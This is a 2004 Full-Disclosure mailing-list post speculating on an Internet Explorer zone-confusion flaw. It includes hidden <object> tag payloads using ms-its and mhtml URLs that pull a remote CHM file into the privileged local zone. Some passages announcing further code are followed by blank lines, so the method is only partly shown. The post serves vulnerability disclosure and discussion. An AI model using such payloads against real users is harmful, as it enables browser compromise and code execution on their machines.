[Full-Disclosure] COELACANTH: After Math

Date: 06/11/04

  • Next message: Rachael Treu-Gomes: "Re: [Full-Disclosure] !! Internet Explorer !!"
    To: <full-disclosure@lists.netsys.com>
    Date: Fri, 11 Jun 2004 14:17:37 -0000

    There is a sneaking suspicion that you can put the site contents
    in the so-called 'local zone' or 'my computer'.

    Since it validates the 'front end' of the address and ends up at
    the 'back end' this all would seem very similar to:

    <object data="ms-its:mhtml:file://C:foo.mhtml!
    http://www.malware.com//bad.chm::/foo.html" type="text/x-
    scriptlet" style="visibility:hidden">

    where Internet Explorer gets 'confused' by the url
    mhtml:file://C:foo.mhtml! switches to the local zone as a
    result of C:, stays there and passes through to the 'back end'
    http://www.malware.com//bad.chm::/foo.html on the remote server
    while in the 'local zone' and renders foo.html in there.

    If this peculiar DNS setup also has a 'proper' chm file on it
    the following should work [as it does on any server setup]:

    <object data="ms-its:http://www.malware.com//bad.chm::/foo.html"
    type="text/x-scriptlet" style="visibility:hidden">

    now as above if we include in the 'front end':


    It should see it as in C: and make its little 'zone'
    determination first, then pass through to the 'back end'


    and render foo.html in the 'local zone' even though it is on the
    remote server.

    You'd have to tinker quite a bit:



    Anyone have a server they care to setup?

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Rachael Treu-Gomes: "Re: [Full-Disclosure] !! Internet Explorer !!"